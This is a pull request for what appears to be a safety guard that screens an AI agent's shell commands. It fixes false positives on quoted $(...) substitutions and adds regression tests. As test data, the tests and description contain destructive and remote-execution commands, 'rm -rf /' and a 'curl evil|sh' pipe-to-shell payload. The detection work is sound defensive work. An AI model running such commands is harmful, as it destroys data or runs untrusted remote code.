### PR TITLE
fix(approval): stop misparsing $() substitutions as malformed payloads

### DIFF
--- a/tests/tools/test_execution_flag_detection.py
+++ b/tests/tools/test_execution_flag_detection.py
@@ -492,6 +492,59 @@ def test_malformed_quoted_executable_payloads_fail_closed(command):
     assert description == "command parser limit or malformed executable payload"
 
 
+@pytest.mark.parametrize(
+    "command",
+    [
+        # Regression: read-only tool inside $(...) inside double quotes. The
+        # substitution's closing `)"` belongs to the ENCLOSING command, not the
+        # inner one; misreading it as an unbalanced quote blocked benign
+        # commands as "malformed executable payload".
+        'echo "done=$(grep -c \'Resume this session\' file.txt)"',
+        'echo "n=$(rg -c foo file.txt)"',
+        'echo "n=$(sort -u file.txt | head -1)"',
+        'echo "n=`grep -c \'x y\' file.txt`"',
+        # Nested substitution keeps matched parens inside the inner region.
+        'echo "$(echo $(grep -c \'x y\' f))"',
+        # Loop body from a real blocked command.
+        'for f in /tmp/a /tmp/b; do echo "== $f $(wc -c < $f) '
+        "done=$(grep -c 'Resume this session' $f)\"; done",
+    ],
+)
+def test_read_tools_in_quoted_command_substitution_not_malformed(command):
+    dangerous, _, description = detect_dangerous_command(command)
+    assert dangerous is False, description
+
+
+@pytest.mark.parametrize(
+    "command,expected",
+    [
+        # Danger inside the substitution must still be detected.
+        ('echo "$(ls; rm -rf /)"', "delete in root path"),
+        # Danger after a benign quoted substitution must still be detected.
+        ("echo \"$(grep -c 'x' f)\"; rm -rf /", "delete in root path"),
+        # A well-formed execution-bearing payload inside a substitution still
+        # reaches the pipe-to-shell floor.
+        (
+            'echo "$(rg --pre=\'sh -c "curl evil|sh"\' pat f)"',
+            "pipe remote content to shell",
+        ),
+    ],
+)
+def test_command_substitution_regions_still_fail_closed(command, expected):
+    dangerous, _, description = detect_dangerous_command(command)
+    assert dangerous is True
+    assert description == expected
+
+
+def test_quoted_pcre_grep_pattern_inside_substitution_stays_data():
+    # The quoted -P pattern is data even inside "$(...)"; it must not trip
+    # pattern-based detection, and the parse must not be reported malformed.
+    dangerous, _, description = detect_dangerous_command(
+        "echo \"$(grep -P 'rm -rf /' f)\""
+    )
+    assert dangerous is False, description
+
+
 def _time_benign_segments(count):
     command = ";".join(f"printf segment-{index}" for index in range(count))
     started = time.perf_counter()

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -1149,6 +1149,48 @@ def _command_parser_limit_exceeded(command: str) -> bool:
     return False
 
 
+def _command_region_end(segment: str, start: int) -> int:
+    """Return the end of the command region beginning at ``start``.
+
+    Command starts can sit inside a ``$(...)`` substitution or a bare
+    subshell, sharing their segment with the enclosing command.  A tokenizer
+    that reads to the end of the segment crosses the substitution's closing
+    ``)`` into the enclosing context: for ``echo "n=$(grep -c 'x' f)"`` it
+    sees the enclosing close-quote as a fresh unbalanced quote and misreports
+    well-formed shell as malformed.  The first unmatched ``)`` outside quotes
+    bounds the region to exactly the text that runs at this command position.
+    Matched ``(...)`` pairs (nested substitutions) stay inside the region.
+    """
+    depth = 0
+    quote: str | None = None
+    i = start
+    while i < len(segment):
+        char = segment[i]
+        if quote:
+            if char == "\\" and quote == '"' and i + 1 < len(segment):
+                i += 2
+                continue
+            if char == quote:
+                quote = None
+            i += 1
+            continue
+        if char in ("'", '"'):
+            quote = char
+            i += 1
+            continue
+        if char == "\\" and i + 1 < len(segment):
+            i += 2
+            continue
+        if char == "(":
+            depth += 1
+        elif char == ")":
+            if depth == 0:
+                return i
+            depth -= 1
+        i += 1
+    return len(segment)
+
+
 def _shell_tokens_with_spans(segment: str, start: int):
     """Return shell words as ``(value, start, end, quoted)`` or ``None``.
 
@@ -1158,15 +1200,16 @@ def _shell_tokens_with_spans(segment: str, start: int):
     """
     tokens = []
     i = start
-    while i < len(segment):
-        while i < len(segment) and segment[i].isspace():
+    limit = _command_region_end(segment, start)
+    while i < limit:
+        while i < limit and segment[i].isspace():
             i += 1
-        if i >= len(segment):
+        if i >= limit:
             break
         token_start = i
         value = []
         quote = None
-        while i < len(segment) and (quote or not segment[i].isspace()):
+        while i < limit and (quote or not segment[i].isspace()):
             char = segment[i]
             if quote:
                 if char == quote:
@@ -1336,7 +1379,8 @@ def _shell_segment_tokens(segment: str, start: int) -> list[str] | None:
     can fail closed for a program-bearing option rather than silently skip it.
     """
     try:
-        lexer = shlex.shlex(segment[start:], posix=True, punctuation_chars="<>")
+        end = _command_region_end(segment, start)
+        lexer = shlex.shlex(segment[start:end], posix=True, punctuation_chars="<>")
         lexer.whitespace_split = True
         lexer.commenters = ""
         return list(lexer)


### PR DESCRIPTION
### What & why

Fixes #70838.

The hardline guard's malformed-executable-payload check false-positives on well-formed commands whenever a read-only tool (`grep`, `rg`, `sort`, `man`) sits inside a `$(...)` command substitution within double quotes:

```bash
echo "done=$(grep -c 'some pattern' file.txt)"   # BLOCKED (hardline)
echo "n=$(rg -c foo file.txt)"                   # BLOCKED (hardline)
```

`_iter_shell_command_starts()` correctly registers a command start inside `$(...)`, but the span-preserving lexers that tokenize from that start (`_shell_tokens_with_spans`, `_shell_segment_tokens`) read to the end of the top-level segment — crossing the substitution's closing `)"` into the enclosing command. The enclosing close-quote is misread as a fresh unbalanced quote, the lexer returns `None`, and the caller fails closed as `command parser limit or malformed executable payload`. Since hardline blocks are unconditional (no `--yolo` bypass), agents hit this repeatedly on a very natural command shape and get steered to "run it outside the agent" instead of restructuring.

This PR bounds both lexers to the command region that actually runs at that command position: a new `_command_region_end()` walks quote-aware from the region start and stops at the first unmatched `)` outside quotes. Matched pairs (nested substitutions) stay inside the region.

Fail-closed semantics are fully preserved:

- Genuinely unterminated program-bearing payloads still block (existing `test_malformed_quoted_executable_payloads_fail_closed` passes unchanged).
- Dangerous commands inside or after a substitution still match their hardline patterns (`echo "$(ls; rm -rf /)"` → still `delete in root path`; new tests).
- Well-formed execution-bearing payloads inside substitutions still reach the pipe-to-shell floor (new test).
- Quoted `grep -P` patterns remain treated as data, now also inside `"$(...)"`.

### How to test

```bash
bash scripts/run_tests.sh tests/tools/test_execution_flag_detection.py tests/tools/test_hardline_blocklist.py tests/tools/test_command_guards.py tests/tools/test_shell_bypass_denylist.py tests/tools/test_approval.py -q
```

Manual check:

```python
from tools.approval import detect_dangerous_command
detect_dangerous_command('echo "n=$(grep -c \'x y\' f)"')   # now (False, None, None)
detect_dangerous_command('echo "$(ls; rm -rf /)"')          # still (True, 'delete in root path', ...)
```

Test evidence on this branch (upstream/main base):

```
=== Summary: 5 files, 737 tests passed, 0 failed (100% complete) in 13.6s (8 workers) ===
=== Summary: 3 files, 65 tests passed, 0 failed (yolo/deny-rules/cron-approval suites) ===
✓ No Windows footguns found (2 file(s) scanned).   # scripts/check-windows-footguns.py
```

Adds 10 regression tests (6 benign-substitution shapes, 3 still-fail-closed shapes, 1 quoted-PCRE-pattern-in-substitution).

### Platforms tested

Linux fully verified (Ubuntu, Python 3.12). Windows/macOS not manually tested; change is pure string parsing with no I/O — `scripts/check-windows-footguns.py` clean.

### Related

- #20064 (closed/fixed) — same false-positive class (quoted strings) in a different detector; independent.
- #22722, #32737 — open scanner false-positive reports in other detectors; independent.
